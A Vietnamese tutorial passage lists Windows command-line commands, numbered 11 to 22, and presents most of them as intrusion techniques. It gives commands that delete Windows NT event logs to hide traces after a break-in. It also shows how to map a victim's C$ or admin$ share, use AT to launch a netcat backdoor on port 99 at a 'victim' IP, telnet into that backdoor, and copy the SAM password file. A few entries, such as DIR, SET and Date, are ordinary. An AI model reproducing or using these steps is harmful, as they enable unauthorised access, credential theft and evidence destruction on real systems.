11. Lệnh DIR:

Cú pháp: DIR [drive:][path][filename]

Công dụng: Để xem file, folder.

12. Lệnh DEL:

Cú pháp: DEL [drive:][path][filename]

Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT:

Code:

del C:\winnt\system32\logfiles\*.*

del C:\winnt\ssytem32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

13. Lệnh tạo ổ đĩa ảo trên computer:

Cú pháp: Net use z: \\ip\C$ ( hoặc là IPC$ )

Công dụng: Tạo 1 đĩa ảo trên máy tình của mình từ tài nguyên chia se trên mạng.Để hiểu hơn về lệnh này các bạn chú ý theo dõi các bài viết sau, tôi sẽ hưỡng dẫn kĩ hơn.

14. Lệnh Net Time:

Cú pháp: Net Time \\ip

Công dụng: Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.

15. Lệnh AT:

Cú pháp: AT \\ip

Công dụng: Khởi động các ứng dụng trên máy victim

Ví dụ: ở đây tôi có con trojan tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máy victim rồi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 .

Code: Net Time \\68.135.23.25

Bây giờ nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00.

Code: AT \\68.135.23.25 12:3 nc.exe

Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.

16. Lệnh Telnet:

Cú pháp: telnet host port

VD: telnet 68.135.23.25 99

Công dụng: Kết nối đến host qua port xx. Gõ telnet /? để biết thêm chi tiết.

17. Lệnh COPY:

Cú pháp: COPY [nguồn] [đích]

Công dụng: Copy file. Gõ copy/?để biết thêm.

Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1

Code: Copy Index.html \\127.0.0.1\C$\index.html

nếu bạn copy lên folder winNt

Code: Copy index.html \\127.0.0.1\admin$\index.html

muốn copy files trên máy victm thì bạn gõ vào :

Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\

18. Lệnh SET:

Cú pháp: SET

Công dụng: Displays, sets, or removes cmd.exe enviroment variables.

19. Lệnh Nbtstat:

Cú pháp: Nbtstat

Công dụng: Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP). Gõ Nbtstat/? để biết rõ hơn.

20. Lệnh Date:

Cú pháp: Date /T

Công dụng:

Nếu chỉ gõ lệnh date thì hệ thống sẽ hiển thị ngày giờ hệ thống và yêu cầu bạn nhập ngày giờ mới để edit.

Nếu gõ lệnh date /t thì bạn chỉ coi thông tin về ngày giờ hệ thống

21. Lệnh xuất thông tin thành file *.txt:

Cú pháp: Câu lệnh >[drive]:\[path]\tenfile.txt

Công dụng: xuất một tham số nào đó ra 1 file text .

Ví dụ: bạn đánh lệnh sau:

Code: ipconfig >C:\myip.txt Hệ thống sẽ tạo ra file myip.txt lưu ở ổ đĩa C với thông tin là IP, Gateway, Subnet Mask

22. Lệnh openfiles:

Cú pháp: OpenFiles /Disconnect /ID id hoặc OpenFiles /Disconnect /A tên-truy-cập

Công dụng: Cho biết ai đang dùng các tập tin (thư mục) mà bạn đang chia sẽ trên hệ thống mạng